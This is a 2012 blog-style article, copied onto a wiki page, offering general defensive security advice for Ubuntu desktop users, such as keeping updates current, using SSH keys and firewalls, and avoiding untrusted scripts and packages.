User Tools

Site Tools


projects:security:ubuntusecurity

Protecting Your Ubuntu Desktop

By Matt Hartley
October 22, 2012

With all the talk recently about Ubuntu's use of Dash ad and the various new features offered, I find it interesting that security is virtually being ignored.

This isn't to say that articles about Ubuntu security don't exist, rather that we don't see a lot of articles in the mainstream tech circles talking about Ubuntu security as a topic. In this article, I hope to address this shortcoming.

Linux malware

It amuses me whenever I read someone's comment stating that Linux is bulletproof and how their distribution of Linux is somehow immune to malware threats.

Anyone who has an understanding of how malware is spread realizes that no operating system is completely secure. Where newbies tend to get confused is in how malware affects different desktop platforms.

Windows, for example, has had a long history of battling malware threats. And while today's modern releases are more secure than in years past, malware protection is still generally recommended for most Windows users.

More recently, we've seen a number of security products being developed for Linux and OS X. What makes this completely pointless is that the “threats” these security suites are designed to tackle won't affect Linux based installations.

In short, using an anti-virus scanner in Linux is only useful for protecting dual-boot systems that share files. For example, those added in the occasional shared file via email or Dropbox. Outside of protecting “Windows using co-workers,” we're simply not at a point yet where Linux malware on the desktop Linux is the same kind of threat seen on Windows PCs.

However, this doesn't mean that Linux distros are completely safe from other attack vectors.

Security through obscurity isn't enough

With any sort of a Linux virus threat put on hold for the time being, there are still a number of key areas where your Ubuntu installation could be at risk for attack. But unlike other operating systems, malware likely to affect your system is going to come from the Web and not from an infected file.

Yes, there are and have been exceptions to this rule. But usually it's a poorly configured set of security practices that will land a Linux user in trouble.

One of the most common attacks I've seen affect Linux users are phishing attempts. Instead of executing code on your machine, the attacker executes the actions of the end user or target who foolishly gives up critical login information that leads to a hacked account. Sometimes this could be through Facebook apps or even authorized applications on Twitter.

Similar attacks come from web-based code, including cross-site scriptingcross-site request forgeries, and other related exploits.

These attacks are easy enough to avoid for advanced Linux users, yet less security savvy folks may want to rely on select browser add-ons to provide an added layer of safety. More on this later in this article.

Another common area of attack comes from not updating your Linux systems to the latest security patches, or simply leaving easy attack vectors such as your browser set to use Java or Flash automatically when prompted. The most dangerous of the two is the Java plugin for your browser, asthis articlepoints out.

Thanks to the cross platform friendliness of Java, this is likely to become an increasing security threat to Linux users who aren't paying close attention to their browser configuration.

Good offense begins with a great defense

For the casual Ubuntu user, rootkitstrojans and network intrusion are unlikely scenarios.


This isn't to say that they won't ever be a threat for a desktop Linux user, rather that it's highly unlikely. Nevertheless, there are some basic security practices that should be made part of your routine.

Run Security Updates – Whether for Ubuntu or something else altogether, keep those security updates current.

Secure Ports – If you don't need a port open, close it. A great GUI firewall manager is Gufw.

SSH RSA keys – For the sake of sanity, don't use weak passwords when running SSH on your Ubuntu box. Over the course of a day, you'll find countless attacks on your SSH port trying to crack what might be a weak password setup. I recommend using RSA keys instead. This prevents an attacker from “cracking” into your SSH setup via a password exploit.

Minimize attacks – Even though simply using RSA keys will help better secure your SSH setup, adding DenyHosts to the mix is good advice. This will keep malicious users from hitting your system and eating up resources, plus it will keep your log file a lot smaller.

AdBlockers/ NoScript Browser Add-ons – Add-ons such as NoScript or AdBlock Plus can help prevent javascript related exploits from creating problems through your browser in the first place.

There are countless additional things that can be done to further secure an Ubuntu installation, but these are the big things to consider. Now you may have noticed that I didn’t mention encryption of your home directory. For newbies, I'm against the idea of encrypting your home directory, simply because most people screw something up and lose their data.

For those set on encryption, however, my advice is to make a backup of your data BEFORE attempting to encrypt your home directory. Once you've done this, you can follow this guide to get you started in better securing your local home directory data.

Everything above will provide you with a solid primer for better securing your data and keeping yourself free from exploits. But there is one last consideration that is, perhaps, the biggest untapped threat yet.

Anything executable is dangerous

I realize it must sound paranoid to say that anything that can be executable on an Ubuntu installation is a potential risk. Yet when you stop to think about it, for new users, it absolutely is a massive risk being completely ignored.

From mystery Deb packages to unknown PPA repositories, unless these things have been vetted by a trusted source you’re playing with fire.

Thus far we've been fortunate and no one has released a dangerous package to the Ubuntu-using masses. And if users simply stick to trusted software sources only, they will never experience a problem in this area.

But when you consider the vast amount of bash/python scripts and other little Ubuntu tweak-related hacks, it's clear that users need to pay close attention to what these changes are doing to their system. All one has to do is blindly grant root privileges to run a dangerous script or install malicious software, and the typical end user would be in real trouble.

Again, thus far nothing has gone horribly wrong…but this doesn't mean that this approach should continue to be encouraged. Instead, I strongly advise new users to only grab software from trusted sources. We know that trusted sources like the official Ubuntu repositories are safe to use. Though it might seem paranoid, for newbies I recommend sticking with this source exclusively for software.

Think I'm overstating how dangerous random scripts can be? Take a look at this list of very basic examples. All it takes is blindly allowing root privileges and it's game over.

The biggest security threat out there

The biggest security threat to an Ubuntu installation isn't what we'd normally consider to be malware. No, the single most dangerous thing that can happen to your data is executing random code without fully grasping what it does.

Even something as benign as configuring hdparm incorrectly can go beyond what most malware can do – it can flat out ruin your hard drive if used improperly, though not visibly with immediate damage.

So, with the understanding of how important it is to be careful, the best security suite available for Ubuntu users will never be purchased from a store shelf. The best security is knowledge and the willingness to spend a little time reading up on how to properly secure your Ubuntu system.

By following the basic tips found under the “good offense” section above, odds are you won't ever have any security problems.



projects/security/ubuntusecurity.txt · Last modified: 2017/06/27 15:41 by 127.0.0.1